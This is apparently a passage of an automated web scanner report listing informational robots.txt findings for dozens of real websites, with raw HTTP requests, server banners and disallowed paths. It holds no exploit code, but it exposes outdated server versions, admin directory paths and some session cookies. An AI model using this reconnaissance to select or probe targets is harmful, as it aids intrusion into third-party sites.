# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
30.370. http://www.reelseo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reelseo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reelseo.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:37:59 GMT
Server: Apache
Last-Modified: Wed, 16 Feb 2011 03:52:57 GMT
ETag: "3f5-49c5e3763f840"
Accept-Ranges: bytes
Content-Length: 1013
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Mon, 02 May 2011 01:37:59 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /feed/podcast/
Allow: /wp-content/uploads/
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/
Disallow: /feed/
Disallow: /trackback/
Disallow: /forms/
Disallow: /
...[SNIP]...
30.371. http://www.rezstreamsynch.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rezstreamsynch.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rezstreamsynch.net

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 06 Oct 2009 22:04:08 GMT
Accept-Ranges: bytes
ETag: "a0a156edd046ca1:468"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:56:04 GMT
Connection: close

User-agent: *
Disallow: /
30.372. http://www.riu.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.riu.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.riu.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:45:33 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Wed, 27 Apr 2011 15:22:12 GMT
ETag: "2b45c0-84-4a1e8013b7100"
Accept-Ranges: bytes
Content-Length: 132
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# riu.com robots.txt
# lastmods 27.04.2011

User-agent: *
Disallow: /?*
Disallow: /*.jsp?*

Sitemap: http://www.riu.com/sitemap.xml
30.373. http://www.rnbxclusive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rnbxclusive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rnbxclusive.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:02:42 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.9.1.3
Set-Cookie: PHPSESSID=433adaccc282583342ab18a968cc1e59; path=/
X-Pingback: http://rnbxclusive.com/xmlrpc.php
Content-Length: 72
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://rnbxclusive.com/sitemap.xml.gz
30.374. http://www.ronnies.com/micro.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ronnies.com
Path:   /micro.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ronnies.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 02:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25
Content-Type: text/plain
Cache-control: private

User-agent: *
Allow: /
30.375. http://www.ronniesmailorder.com/fiche_select.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ronniesmailorder.com
Path:   /fiche_select.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ronniesmailorder.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 02:30:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25
Content-Type: text/plain
Cache-control: private

User-agent: *
Allow: /
30.376. http://www.rtsports.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rtsports.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rtsports.com

Response

HTTP/1.0 200 OK
Date: Fri, 29 Apr 2011 22:42:35 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Tue, 12 May 2009 16:54:36 GMT
ETag: "b92720-46-469b9f3250b00"
Accept-Ranges: bytes
Content-Length: 70
Vary: Accept-Encoding
Content-Type: text/plain
Age: 179116
X-Cache: HIT from tarkenton2.rtsports.com
X-Cache-Lookup: HIT from tarkenton2.rtsports.com:80
Via: 1.1 tarkenton2.rtsports.com:80 (squid/2.7.STABLE3)
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.rtsports.com/sitemap.xml
30.377. http://www.ryder.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ryder.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ryder.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 02 May 2011 00:12:07 GMT
Content-length: 82
Content-type: text/plain
Last-modified: Fri, 08 Oct 2010 13:18:38 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /content/
Disallow: /pdf/
Disallow: /xml/
Allow: /

30.378. http://www.s10forum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.s10forum.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.s10forum.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:11:14 GMT
Server: Apache
Last-Modified: Tue, 01 May 2007 23:49:21 GMT
Accept-Ranges: bytes
Content-Length: 1094
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: Slurp
Crawl-delay: 60
User-agent: Mediapartners-Google*
User-agent: *
Disallow: /forum/vbseo_sitemap
Disallow: /forum/admincp
Disallow: /forum/attachments
Disallow: /forum/attachment.php
D
...[SNIP]...
30.379. http://www.sailboatlistings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailboatlistings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sailboatlistings.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:00 GMT
Server: Apache
Last-Modified: Sat, 16 Oct 2010 22:32:02 GMT
Accept-Ranges: bytes
Content-Length: 59
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /contact/
Disallow: /report-abuse/
30.380. http://www.schnucks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.schnucks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.schnucks.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:37:09 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 13:19:39 GMT
ETag: "17-4939913d750c0"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:
30.381. http://www.schoolsk-12.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.schoolsk-12.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.schoolsk-12.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:11:38 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
Last-Modified: Fri, 23 Jul 2010 14:30:14 GMT
ETag: "100000001ba54-21-48c0edf81a2fd"
Accept-Ranges: bytes
Content-Length: 33
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/

30.382. http://www.sdge.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdge.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sdge.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:50:48 GMT
Server: Apache
Last-Modified: Mon, 12 Apr 2010 20:44:22 GMT
ETag: "94-4841035b15580"
Accept-Ranges: bytes
Content-Length: 148
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /images/
Disallow: /email/
Disallow: /media/
Disallow: /sandbox/
Disallow: /vendor/
Disallow: /includes/

30.383. http://www.seiu.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seiu.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seiu.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:32 GMT
Server: Apache
Last-Modified: Tue, 07 Oct 2008 16:03:41 GMT
ETag: "500b1-51-458abf17d1140"
Accept-Ranges: bytes
Content-Length: 81
Vary: Accept-Encoding
Web-Head: vps107.advomatic.com
Connection: close
Content-Type: text/plain

Sitemap: http://www.seiu.org/sitemap.xml
User-agent: Googlebot
Disallow: /*.cfm$
30.384. http://www.seoq.com/webstatshq/www.onlinemicrofiche.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /webstatshq/www.onlinemicrofiche.com

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seoq.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:12:54 GMT
Server: Apache
Set-Cookie: PHPSESSID=cv7iirbdja1lpi5ipdaaln5e50; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:
30.385. http://www.shareup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shareup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shareup.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:50:29 GMT
Server: Apache
Last-Modified: Fri, 12 Oct 2007 16:52:59 GMT
ETag: "17810b7-625-8d1630c0"
Accept-Ranges: bytes
Content-Length: 1573
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow: /search.php
Disallow: /devhome.php
Disallow: /getfile.php
Disallow: /buy-now.php
Disallow: /buynow.php
User-agent: DigOut4U
Disallo
...[SNIP]...
30.386. http://www.sheddaquarium.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sheddaquarium.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sheddaquarium.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:05:20 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 22 Jan 2010 21:13:14 GMT
ETag: "580263-6c-499f8e80"
Accept-Ranges: bytes
Content-Length: 108
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /old_pdf/
Disallow: /old_flash/
Disallow: /old_images/
Disallow: /old_html/
Allow: /
30.387. http://www.shoppingsage.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shoppingsage.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shoppingsage.info

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:45:02 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 07 Apr 2010 21:01:44 GMT
ETag: "748c6-1a-483abde981e00"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

user-agent: *
Disallow: /
30.388. http://www.slotocash.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slotocash.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.slotocash.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:37 GMT
Server: Apache
Last-Modified: Fri, 11 Apr 2008 10:24:40 GMT
Accept-Ranges: bytes
Content-Length: 53
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /lp/
Disallow: /includes/
30.389. http://www.smoker-cooking.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smoker-cooking.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smoker-cooking.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:01:04 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.smoker-cooking.com/7Wi62WEv.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn/

...[SNIP]...
30.390. http://www.snapdealz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snapdealz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.snapdealz.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:45:10 GMT
Server: Apache/2.2.17
Last-Modified: Tue, 02 Jun 2009 05:29:10 GMT
ETag: "2a-46b56d282f580"
Accept-Ranges: bytes
Content-Length: 42
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /
Disallow: /goto.php
30.391. http://www.softlist.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlist.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.softlist.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:29:04 GMT
Server: Apache
Last-Modified: Wed, 26 Dec 2007 11:45:27 GMT
Accept-Ranges: bytes
Content-Length: 79
Cache-Control: max-age=15552000
Expires: Sat, 29 Oct 2011 00:29:04 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain


User-agent: *
Disallow: /visit.php
Disallow: /buy.php
Disallow: /get.php
30.392. http://www.songs-lyrics.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.songs-lyrics.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.songs-lyrics.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:36 GMT
Server: Apache/2.2.14 (Fedora)
Last-Modified: Wed, 30 Sep 2009 18:20:44 GMT
ETag: "194009-17-474cf96ce5700"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:
30.393. http://www.spirit-of-metal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spirit-of-metal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spirit-of-metal.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8o
Last-Modified: Sun, 02 Jan 2011 11:25:59 GMT
ETag: "5adae-6e-498db4cb47fc0"
Accept-Ranges: bytes
Content-Length: 110
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /membre/

User-agent: *
Disallow: /soumission/

User-agent: *
Disallow: /forum/membre/
30.394. http://www.stoik.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stoik.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stoik.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:17:54 GMT
Server: Apache
Last-Modified: Sat, 12 Mar 2011 16:05:43 GMT
ETag: "6eec727-a9-49e4b4028e3c0"
Accept-Ranges: bytes
Content-Length: 169
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /company/legal/
Disallow: /bitrix/
Disallow: /admin/
Disallow: /upload/
Disallow: /checkupdate/


Sitemap: http://www.stoik.com/sitemap_index.xml
30.395. http://www.studylight.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.studylight.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.studylight.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:36:43 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 28 Jul 2010 18:49:54 GMT
ETag: "4d914c5-2a2-48c7715591880"
Accept-Ranges: bytes
Content-Length: 674
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=iso-8859-1

# robots.txt file for StudyLight.org
# last modified January 19, 2001
# jgarrison@studylight.org

User-agent: *
Crawl-Delay: 30

User-agent: NPBot
Disallow: /

User-agent: msnbot
Crawl-Delay: 60

# ba
...[SNIP]...
30.396. http://www.style-hair-magazine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.style-hair-magazine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.style-hair-magazine.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:54:12 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.style-hair-magazine.com/I4rjKRsn.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /
...[SNIP]...
30.397. http://www.superhost.pl/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superhost.pl
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.superhost.pl

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:45 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Mon, 28 Mar 2011 13:39:24 GMT
ETag: "65570a-4a-1259fb00"
Accept-Ranges: bytes
Content-Length: 74
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /category/aktualnosci/
Disallow: /rekrutacja-da/

30.398. http://www.support.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.support.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.support.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:34 GMT
Server: Apache
Last-Modified: Tue, 04 Jan 2011 23:29:16 GMT
ETag: "1000000031881-6aa-4990da31423c0"
Accept-Ranges: bytes
Content-Length: 1706
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...
30.399. http://www.sweepsadvantage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sweepsadvantage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sweepsadvantage.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=ISO-8859-1
Date: Mon, 02 May 2011 00:36:59 GMT
Content-Language: en-US
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-okpfkgjm=94F44E0EC01EB5E8C79939F604B1DA66; path=/
Last-Modified: Wed, 19 May 2010 13:11:44 GMT
Content-Length: 6371

User-agent: Mediapartners-Google
Disallow:

User-agent: TurnitinBot
Disallow: /

User-agent: Black Hole
Disallow: /

User-agent: Titan
Disallow: /

User-agent: WebStripper
Disallow: /

User-agent: Ne
...[SNIP]...
30.400. http://www.sythe.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sythe.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sythe.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:02:02 GMT
Server: nginx admin
Content-Type: text/plain; charset=UTF-8
Content-Length: 149
Last-Modified: Tue, 21 Sep 2010 06:00:57 GMT
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 00:02:02 GMT
Cache-Control: max-age=604800
X-Cache: HIT from Backend
Accept-Ranges: bytes
Connection: close

User-agent: *
Disallow: /cgi-bin/
Allow: /

User-agent: Googlebot
Allow: /
Disallow: /cgi-bin/

User-agent: MJ12bot
Disallow: /
Disallow: /cgi-bin/

30.401. http://www.tacklewarehouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tacklewarehouse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tacklewarehouse.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:27 GMT
Server: Kerio_WebSTAR/5.4.2 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Thu, 08 Jul 2010 21:17:24 GMT
Content-Length: 24
Content-Type: text/plain

User-agent: *
Disallow:
30.402. http://www.techonlife.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.techonlife.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.techonlife.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:20 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "210629f-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php
30.403. http://www.techtalkz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.techtalkz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.techtalkz.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:21 GMT
Server: Apache
Last-Modified: Fri, 26 Mar 2010 20:58:04 GMT
ETag: "414d55-392-482ba6b62af00"
Accept-Ranges: bytes
Content-Length: 914
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.techtalkz.com/sitemap_index.xml.gz
Disallow: /cgi-bin/
Disallow: /ajax.php
Disallow: /attachment.php
Disallow: /calendar.php
Disallow: /cron.php
Disallow: /editpost.p
...[SNIP]...
30.404. http://www.teensfilm.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.teensfilm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.teensfilm.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:10 GMT
Server: Apache
Last-Modified: Wed, 30 Sep 2009 13:44:40 GMT
ETag: "14c1045-33-4ac360c8"
Accept-Ranges: bytes
Content-Length: 51
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /cgi-bin/
Disallow: /cgi/
30.405. http://www.tellmehowto.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tellmehowto.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tellmehowto.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:18 GMT
Server: Apache
Last-Modified: Wed, 09 May 2007 09:57:17 GMT
ETag: "ad3b1f05-37-8f2ef940"
Accept-Ranges: bytes
Content-Length: 55
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /askaquestion/
Disallow: /test/
30.406. http://www.tenniswarehouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenniswarehouse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tenniswarehouse.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:23 GMT
Server: Kerio_WebSTAR/5.4.2 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Wed, 22 Feb 2006 13:23:20 GMT
Content-Length: 25
Content-Type: text/plain

User-agent: *
Disallow:
30.407. http://www.thaimisc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thaimisc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thaimisc.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:08:51 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.4
Last-Modified: Wed, 30 Jul 2008 08:17:08 GMT
ETag: "cd116a-a0-4533961ece900"
Accept-Ranges: bytes
Content-Length: 160
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /freewebboard/php/vreply.php?topic=4669&user=benjapol
Disallow: /freewebboard/php/vreply.php?user=freecdbuddha&topic=40&page=3
Allow: /
30.408. http://www.the-bikini.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.the-bikini.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.the-bikini.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 22:48:58 GMT
Server: Apache
Last-Modified: Thu, 10 Feb 2005 21:52:15 GMT
ETag: "12f66-17-31e9c1c0"
Accept-Ranges: bytes
Content-Length: 23
Cache-Control: max-age=-196217743
Expires: Thu, 10 Feb 2005 21:53:15 GMT
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
30.409. http://www.the-clitoris.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.the-clitoris.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.the-clitoris.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:08:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.16
Last-Modified: Thu, 14 Apr 2011 09:44:50 GMT
ETag: "a1800a-37d-4a0ddc6c72880"
Accept-Ranges: bytes
Content-Length: 893
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /bargraph/
Disallow: /buttons/
Disallow: /MSOffice/
Disallow: /_vti_bin/
Disallow: /n_html/_vti_cnf/
Disallow: /phpbb/


Disallow: /f_html/female_masturbati
...[SNIP]...
30.410. http://www.theday.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theday.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theday.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 24 Nov 2009 14:40:36 GMT
Accept-Ranges: bytes
ETag: "1e75416146dca1:0"
Server: Microsoft-IIS/7.0
Date: Sun, 01 May 2011 22:31:38 GMT
Content-Length: 324
Age: 5034
X-Cache: HIT from sxsquid04
X-Cache-Lookup: HIT from sxsquid04:80
Via: 1.0 sxsquid04 (squid/3.0.STABLE18)
Connection: close

User-agent: *
Allow: /
Disallow: /apps/pbcs.dll/error
Disallow: /apps/pbcs.dll/search
Disallow: /apps/pbcsi.dll
Disallow: /export
Disallow: /fileupload
Disallow: /NLCCEIMPORTS
Disallow: /misc
...[SNIP]...
30.411. http://www.thefactsaboutfitness.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefactsaboutfitness.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thefactsaboutfitness.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:15:40 GMT
Server: Apache/1.3.42 (Unix) (Red-Hat/Linux) PHP/5.2.13 with Suhosin-Patch mod_ssl/2.8.31 OpenSSL/0.9.8n-fips FrontPage/4.0.4.3
